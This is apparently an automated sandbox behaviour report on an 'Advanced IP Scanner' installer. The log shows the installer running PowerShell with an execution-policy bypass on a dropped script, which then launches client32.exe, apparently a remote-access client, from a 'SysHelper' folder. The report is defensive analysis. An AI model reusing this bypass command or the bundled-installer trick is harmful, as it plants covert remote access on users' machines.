File read: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe "C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Process created: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Process created: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Advanced IP Scanner for Windows.lnk.1.dr

LNK file: ..\..\..\..\..\..\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Roaming\SysHelper\nsm_vpro.ini

Jump to behavior

Reads the Windows registered owner settings

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Executable creates window controls seldom found in malware

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Window found: window name: TSelectLanguageForm

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next

Uses Rich Edit Controls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static file information: File size 21426168 > 1048576

Uses new MSVCR Dlls

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.4194115639.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2084821391.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2165673550.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp
